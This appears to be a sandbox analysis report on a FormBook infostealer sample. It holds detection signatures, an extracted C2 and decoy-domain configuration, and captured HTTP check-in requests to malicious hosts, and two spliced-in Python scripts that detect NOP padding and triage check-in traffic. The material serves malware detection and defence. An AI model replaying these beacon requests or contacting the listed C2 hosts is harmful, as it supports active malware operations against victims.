Windows Analysis Report
7pECKdsaig.exe

Overview

General Information

Sample Name: 7pECKdsaig.exe
Original Sample Name: 3343ba4097fe8b6b91af0ca46abb0baf6052acf1806571432cc7e9e0ba59fa2a.exe
Analysis ID: 830326
MD5: 515bf958f062fec724fbe6bdadf39485
SHA1: 50fbaeb36e98338dc500e252855abf0152bb6bbf
SHA256: 3343ba4097fe8b6b91af0ca46abb0baf6052acf1806571432cc7e9e0ba59fa2a
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Found decision node followed by non-executed suspicious APIs
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection

Source: 7pECKdsaig.exe ReversingLabs: Detection: 76%
Source: 7pECKdsaig.exe Virustotal: Detection: 59%
Source: Yara match File source: 7pECKdsaig.exe, type: SAMPLE
Source: Yara match File source: 0.2.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: 7pECKdsaig.exe Avira: detected
Source: http://www.jacksontcpassettlement.com/ar73/www.ingrambaby.com Avira URL Cloud: Label: malware
Source: http://www.b708.com/ar73/ Avira URL Cloud: Label: malware
Source: http://www.hurricanevalleyatvjamboree.com/ar73/www.innovantexclusive.com Avira URL Cloud: Label: malware
Source: http://www.kellnovaglobalfood.info/ar73/ Avira URL Cloud: Label: malware
Source: http://www.echadholisticbar.com/ar73/www.jacksontcpassettlement.com Avira URL Cloud: Label: malware
Source: http://www.quickhealcareltd.co.uk/ar73/ Avira URL Cloud: Label: malware
Source: http://www.mogi.africa/ar73/www.kellnovaglobalfood.info Avira URL Cloud: Label: malware
Source: http://www.ckpconsulting.com/ar73/www.2348x.com Avira URL Cloud: Label: malware
Source: http://www.kellnovaglobalfood.info/ar73/www.controlplus.systems Avira URL Cloud: Label: malware
Source: http://www.controlplus.systems/ar73/www.quickhealcareltd.co.uk Avira URL Cloud: Label: malware
Source: http://www.kellnovaglobalfood.info/ar73/?Qj=i6BPGBhEPZBlfl7tAP1UBBwzioJGNNDALkR90REkFgMzqoaCb5EMO/kcO5kV95GeH/kMM6gDFg==&x6=n0GdIP_ Avira URL Cloud: Label: malware
Source: http://www.ckpconsulting.com/ar73/ Avira URL Cloud: Label: malware
Source: http://www.mtevz.online/ar73/ Avira URL Cloud: Label: malware
Source: http://www.2348x.com/ar73/ Avira URL Cloud: Label: malware
Source: http://www.arredobagno.club/ar73/www.mtevz.online Avira URL Cloud: Label: malware
Source: http://www.hurricanevalleyatvjamboree.com/ar73/ Avira URL Cloud: Label: malware
Source: http://www.ingrambaby.com/ar73/ Avira URL Cloud: Label: malware
Source: http://www.innovantexclusive.com/ar73/www.1wwuwa.top Avira URL Cloud: Label: malware
Source: http://www.controlplus.systems/ar73/ Avira URL Cloud: Label: malware
Source: http://www.echadholisticbar.com/ar73/ Avira URL Cloud: Label: malware
Source: http://www.jacksontcpassettlement.com/ar73/ Avira URL Cloud: Label: malware
Source: http://www.authenticityhacking.com/ar73/ Avira URL Cloud: Label: malware
Source: http://www.ingrambaby.com/ar73/www.arredobagno.club Avira URL Cloud: Label: malware
Source: http://www.mogi.africa/ar73/ Avira URL Cloud: Label: malware
Source: http://www.arredobagno.club/ar73/ Avira URL Cloud: Label: malware
Source: http://www.1wwuwa.top/ar73/www.echadholisticbar.com Avira URL Cloud: Label: malware
Source: http://www.b708.com/ar73/www.hurricanevalleyatvjamboree.com Avira URL Cloud: Label: malware
Source: http://www.controlplus.systems/ar73/?Qj=pTDthzaqbIgyWHdtpzpwnulvL2qvi2wcQCOYQZrmaB3EJlnnV9x+gp8AnzNn3ZLGsW0uMr4raA==&x6=n0GdIP_ Avira URL Cloud: Label: malware
Source: http://www.authenticityhacking.com/ar73/www.ckpconsulting.com Avira URL Cloud: Label: malware
Source: http://www.mtevz.online/ar73/r Avira URL Cloud: Label: malware
Source: http://www.2348x.com/ar73/www.b708.com Avira URL Cloud: Label: malware
Source: www.2348x.com/ar73/ Avira URL Cloud: Label: malware
Source: http://www.1wwuwa.top/ar73/ Avira URL Cloud: Label: malware
Source: http://www.quickhealcareltd.co.uk/ar73/www.authenticityhacking.com Avira URL Cloud: Label: malware
Source: http://www.innovantexclusive.com/ar73/ Avira URL Cloud: Label: malware
Source: 7pECKdsaig.exe Joe Sandbox ML: detected
Source: 0.0.7pECKdsaig.exe.a80000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.7pECKdsaig.exe.a80000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook
{"C2 list": ["www.2348x.com/ar73/"],
 "decoy": ["classgorilla.com", "b6817.com", "1wwuwa.top", "dgslimited.africa", "deepwaterships.com", "hkshshoptw.shop",
           "hurricanevalleyatvjamboree.com", "ckpconsulting.com", "laojiangmath.com", "authenticityhacking.com",
           "family-doctor-53205.com", "investinstgeorgeut.com", "lithoearthsolution.africa", "quickhealcareltd.co.uk",
           "delightkgrillw.top", "freezeclosettoilet.com", "coo1star.com", "gemgamut.com", "enrichednetworksolutions.com",
           "betterbeeclean.com", "kbmstr.com", "colorusainc.com", "five-dollar-meals.com", "baozhuang8.com",
           "la-home-service.com", "innovantexclusive.com", "chateaudevillars.co.uk", "echadholisticbar.com",
           "naijacarprices.africa", "4652.voto", "kraftheonz.com", "ingrambaby.com", "braeunungsoel.ch",
           "sweetcariadgifts.co.uk", "kui693.com", "akatov-top.ru", "epollresearch.online", "cupandsaucybooks.com",
           "arredobagno.club", "gt.sale", "dskincare.com", "cursosemcasa.site", "leaf-spa.net", "deathbeforedeceit.com",
           "azvvs.com", "laptops-39165.com", "ccwt.vip", "011965.com", "mtevz.online", "jacksontcpassettlement.com",
           "aldeajerusalen.com", "kellnovaglobalfood.info", "alphametatek.online", "lcssthh.com", "dumelogold9ja.africa",
           "d-storic.com", "mogi.africa", "ghostt.net", "aksharsigns.online", "goglucofort.com", "b708.com",
           "controlplus.systems", "lightandstory.info", "invstcai.sbs"]}
Source: 7pECKdsaig.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 7pECKdsaig.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: msdt.pdbGCTL source: 7pECKdsaig.exe, 00000000.00000002.293667137.0000000003520000.00000040.10000000.00040000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000003.281701865.000000000352D000.00000004.00000020.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000003.287536333.00000000036A4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: 7pECKdsaig.exe, 00000000.00000003.251882713.000000000155D000.00000004.00000020.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000002.289263472.000000000180F000.00000040.00001000.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000002.00000003.292381298.000000000490D000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000002.00000002.519078571.0000000004BBF000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000002.00000003.289235822.000000000476D000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000002.00000002.519078571.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: 7pECKdsaig.exe, 7pECKdsaig.exe, 00000000.00000003.251882713.000000000155D000.00000004.00000020.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000002.289263472.000000000180F000.00000040.00001000.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, msdt.exe, 00000002.00000003.292381298.000000000490D000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000002.00000002.519078571.0000000004BBF000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000002.00000003.289235822.000000000476D000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000002.00000002.519078571.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: msdt.pdb source: 7pECKdsaig.exe, 00000000.00000002.293667137.0000000003520000.00000040.10000000.00040000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000003.281701865.000000000352D000.00000004.00000020.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000003.287536333.00000000036A4000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 4x nop then pop ebx 0_2_00A87B1A
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 4x nop then pop edi 0_2_00A96CDD
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4x nop then pop ebx 2_2_00587B1D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4x nop then pop edi 2_2_00596CDD
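The four "4x nop then pop" hits above are two code locations in the sample's unpacked image (module base 0x00A80000 in 7pECKdsaig.exe) that recur inside msdt.exe at a different base, in the 0x00580000 region the Yara rule also matched in the msdt.exe memory dumps. A run of NOPs sitting directly in front of a POP is one of the cheap inline-padding tells behind the report's "Found inlined nop instructions" signature. As an added example that is not part of the sandbox report, the Python below scans a byte buffer for that opcode pattern and cross-checks two dumps by image-relative offset; SAMPLE is a constructed byte string, not bytes taken from the sample, and the base addresses are used only to mirror the report's notation.

```python
"""Scan raw code bytes for short NOP runs ending in a POP (32-bit x86).

Added example for this report, not sandbox output. SAMPLE is a constructed
byte string, not bytes from 7pECKdsaig.exe.
"""
import re
from typing import List, Tuple

# Single-byte x86 encodings: NOP is 0x90; POP r32 is 0x58 + register number.
POP_REG = {0x58: "eax", 0x59: "ecx", 0x5A: "edx", 0x5B: "ebx",
           0x5C: "esp", 0x5D: "ebp", 0x5E: "esi", 0x5F: "edi"}

# Four or more consecutive NOPs immediately followed by a single-byte POP.
NOP_THEN_POP = re.compile(rb"(\x90{4,})([\x58-\x5f])")

# Constructed test buffer: two qualifying sleds and one two-NOP run that
# must not be reported.
SAMPLE = (
    b"\x55\x8b\xec"                # push ebp; mov ebp, esp
    b"\x90\x90\x90\x90\x5b"        # 4x nop then pop ebx   (offset 0x3)
    b"\x33\xc0"                    # xor eax, eax
    b"\x90\x90\x5f"                # only 2 nops before pop edi: ignored
    b"\x90\x90\x90\x90\x90\x5f"    # 5x nop then pop edi   (offset 0xD)
    b"\xc3"                        # ret
)


def find_nop_sleds(code: bytes, base: int = 0) -> List[Tuple[int, int, str]]:
    """Return (address, nop_count, register) for each NOP run that ends in a POP."""
    return [(base + m.start(), len(m.group(1)), POP_REG[m.group(2)[0]])
            for m in NOP_THEN_POP.finditer(code)]


def shared_rvas(hits_a, base_a, hits_b, base_b):
    """Patterns present in two dumps at the same image-relative offset.

    Confirms that code seen in the original process reappears at the same
    RVAs in a process it injected into, whatever the new base is.
    """
    rel_a = {(addr - base_a, n, reg) for addr, n, reg in hits_a}
    rel_b = {(addr - base_b, n, reg) for addr, n, reg in hits_b}
    return sorted(rel_a & rel_b)


def format_hit(addr: int, nops: int, reg: str, pid: int = 0, phase: int = 2) -> str:
    """Render a hit in the report's own 'Nx nop then pop REG P_S_ADDR' style."""
    return f"{nops}x nop then pop {reg} {pid}_{phase}_{addr:08X}"


if __name__ == "__main__":
    original = find_nop_sleds(SAMPLE, 0x00A80000)   # as if dumped from 7pECKdsaig.exe
    injected = find_nop_sleds(SAMPLE, 0x00580000)   # as if dumped from msdt.exe
    for hit in original:
        print(format_hit(*hit))
    common = shared_rvas(original, 0x00A80000, injected, 0x00580000)
    print("shared RVAs:", [hex(rva) for rva, _, _ in common])
```

Run it against the raw bytes of the two unpacked regions (0x00A80000 from process 0, 0x00580000 from process 2) to list every sled in each and the RVAs they share; the threshold of four NOPs matches the report's wording and can be lowered if a packer uses shorter padding.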

Networking

Source: C:\Windows\explorer.exe Domain query: www.controlplus.systems
Source: C:\Windows\explorer.exe Domain query: www.mogi.africa
Source: C:\Windows\explorer.exe Domain query: www.kellnovaglobalfood.info
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49707 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49707 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49707 -> 34.102.136.180:80
Source: Malware configuration extractor URLs: www.2348x.com/ar73/
Source: global traffic HTTP traffic detected:
  GET /ar73/?Qj=i6BPGBhEPZBlfl7tAP1UBBwzioJGNNDALkR90REkFgMzqoaCb5EMO/kcO5kV95GeH/kMM6gDFg==&x6=n0GdIP_ HTTP/1.1
  Host: www.kellnovaglobalfood.info
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii: (seven NUL bytes, nothing printable)
Source: global traffic HTTP traffic detected:
  GET /ar73/?Qj=pTDthzaqbIgyWHdtpzpwnulvL2qvi2wcQCOYQZrmaB3EJlnnV9x+gp8AnzNn3ZLGsW0uMr4raA==&x6=n0GdIP_ HTTP/1.1
  Host: www.controlplus.systems
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii: (seven NUL bytes, nothing printable)
Source: global traffic HTTP traffic detected:
  HTTP/1.1 403 Forbidden
  Server: openresty
  Date: Mon, 20 Mar 2023 08:12:27 GMT
  Content-Type: text/html
  Content-Length: 291
  ETag: "64063330-123"
  Via: 1.1 google
  Connection: close
  Data (291 bytes, ASCII):
  <!DOCTYPE html>
  <html lang="en">
    <head>
      <meta http-equiv="content-type" content="text/html;charset=utf-8" />
      <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" />
      <title>Forbidden</title>
    </head>
    <body>
      <h1>Access Forbidden</h1>
    </body>
  </html>
Source: global traffic HTTP traffic detected:
  HTTP/1.1 403 Forbidden
  Server: openresty
  Date: Mon, 20 Mar 2023 08:12:47 GMT
  Content-Type: text/html
  Content-Length: 291
  ETag: "63fcb05a-123"
  Via: 1.1 google
  Connection: close
  Data (291 bytes, ASCII):
  <!DOCTYPE html>
  <html lang="en">
    <head>
      <meta http-equiv="content-type" content="text/html;charset=utf-8" />
      <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" />
      <title>Forbidden</title>
    </head>
    <body>
      <h1>Access Forbidden</h1>
    </body>
  </html>
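Both captured check-ins are bare GETs with no User-Agent, a short opaque directory (/ar73/) and two two-character query keys, the first carrying a base64-looking blob; that shape is what the Snort alerts above fired on. Note where they went: the extracted configuration lists a single C2 (www.2348x.com/ar73/) and 64 decoy domains, and both hosts contacted here, www.kellnovaglobalfood.info and www.controlplus.systems, are on the decoy list. Blocking only what was observed on the wire therefore misses the real C2. As an added example that is not part of the sandbox report, the Python below parses raw request text, scores it with the editor's own heuristics (not the Emerging Threats rule logic), and labels each contacted host against the extracted configuration. The two request strings reproduce the captured traffic with header line breaks restored; the third request and the trimmed decoy list are constructed for the example.

```python
"""Triage captured HTTP requests for FormBook-style check-ins.

Added example for this report, not sandbox output. CONFIG reproduces the
extracted C2 list and a subset of the decoy list; the heuristics are the
editor's own, not the Snort/ET rule logic.
"""
import re

CONFIG = {
    "C2 list": ["www.2348x.com/ar73/"],
    "decoy": ["kellnovaglobalfood.info", "controlplus.systems", "mogi.africa",
              "b708.com", "1wwuwa.top", "hurricanevalleyatvjamboree.com"],
}

# Two check-ins from the report (line breaks restored) plus one constructed
# benign request for contrast.
REQUESTS = [
    "GET /ar73/?Qj=i6BPGBhEPZBlfl7tAP1UBBwzioJGNNDALkR90REkFgMzqoaCb5EMO/kcO5kV95GeH/kMM6gDFg==&x6=n0GdIP_ HTTP/1.1\r\n"
    "Host: www.kellnovaglobalfood.info\r\nConnection: close\r\n\r\n",
    "GET /ar73/?Qj=pTDthzaqbIgyWHdtpzpwnulvL2qvi2wcQCOYQZrmaB3EJlnnV9x+gp8AnzNn3ZLGsW0uMr4raA==&x6=n0GdIP_ HTTP/1.1\r\n"
    "Host: www.controlplus.systems\r\nConnection: close\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
    "User-Agent: Mozilla/5.0\r\nConnection: keep-alive\r\n\r\n",
]

SHORT_DIR = re.compile(r"^/[A-Za-z0-9]{2,8}/$")       # e.g. /ar73/
B64_BLOB = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")   # long base64-looking value


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, path, query params and headers."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    path, _, query = target.partition("?")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # Split the query by hand: urllib would turn '+' into a space and
    # corrupt the base64 value.
    params = [p.split("=", 1) for p in query.split("&") if p]
    return {"method": method, "path": path, "params": params,
            "headers": headers, "body": body}


def checkin_indicators(req: dict) -> list:
    """Editor's heuristics for a FormBook-style GET check-in."""
    if req["method"] != "GET":
        return []
    hits = []
    if "user-agent" not in req["headers"]:
        hits.append("no User-Agent header")
    if SHORT_DIR.match(req["path"]):
        hits.append("short opaque directory path " + req["path"])
    params = req["params"]
    if (len(params) == 2
            and all(len(p) == 2 and len(p[0]) == 2 and p[0].isalnum() for p in params)
            and B64_BLOB.match(params[0][1])):
        hits.append("two two-character keys, first carries a base64-like blob")
    if req["headers"].get("connection", "").lower() == "close":
        hits.append("Connection: close")
    return hits


def strip_www(host: str) -> str:
    host = host.lower()
    return host[4:] if host.startswith("www.") else host


def classify_host(host: str, config: dict = CONFIG) -> str:
    """Tell the real C2 from a decoy using the extracted configuration."""
    bare = strip_www(host)
    c2 = {strip_www(entry.split("/", 1)[0]) for entry in config["C2 list"]}
    decoys = {strip_www(d) for d in config["decoy"]}
    if bare in c2:
        return "c2"
    if bare in decoys:
        return "decoy"
    return "unknown"


def triage(requests=REQUESTS, config=CONFIG, threshold: int = 3) -> list:
    """Score each request and label the contacted host against the config."""
    results = []
    for raw in requests:
        req = parse_request(raw)
        indicators = checkin_indicators(req)
        host = req["headers"].get("host", "")
        results.append({"host": host,
                        "suspicious": len(indicators) >= threshold,
                        "role": classify_host(host, config),
                        "indicators": indicators})
    return results


if __name__ == "__main__":
    for r in triage():
        print(r["host"], "SUSPICIOUS" if r["suspicious"] else "ok",
              r["role"], "; ".join(r["indicators"]))
```

Feed it the request text from a PCAP or proxy log; the point of the host label is that a "decoy" verdict on every observed check-in is expected for FormBook, so the block list has to come from the extracted configuration, not from the traffic.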
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.1wwuwa.top
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.1wwuwa.top/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.1wwuwa.top/ar73/www.echadholisticbar.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.1wwuwa.topReferer:
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.2348x.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.2348x.com/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.2348x.com/ar73/www.b708.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.2348x.comReferer:
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.arredobagno.club
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.arredobagno.club/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.arredobagno.club/ar73/www.mtevz.online
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.arredobagno.clubReferer:
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.authenticityhacking.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.authenticityhacking.com/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.authenticityhacking.com/ar73/www.ckpconsulting.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.authenticityhacking.comReferer:
Source: explorer.exe, 00000001.00000003.461649448.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.292213498.000000000F5A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461216185.000000000F53F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.267709513.000000000F5A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.462393796.000000000F5B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.254183869.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.289061192.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000002.526453234.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000002.517440543.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000002.530310030.000000000F5B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.288711256.000000000F5A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.263735895.0000000008442000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.b708.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.b708.com/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.b708.com/ar73/www.hurricanevalleyatvjamboree.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.b708.comReferer:
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ckpconsulting.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ckpconsulting.com/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ckpconsulting.com/ar73/www.2348x.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ckpconsulting.comReferer:
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.controlplus.systems
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.controlplus.systems/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.controlplus.systems/ar73/www.quickhealcareltd.co.uk
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.controlplus.systemsReferer:
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.echadholisticbar.com
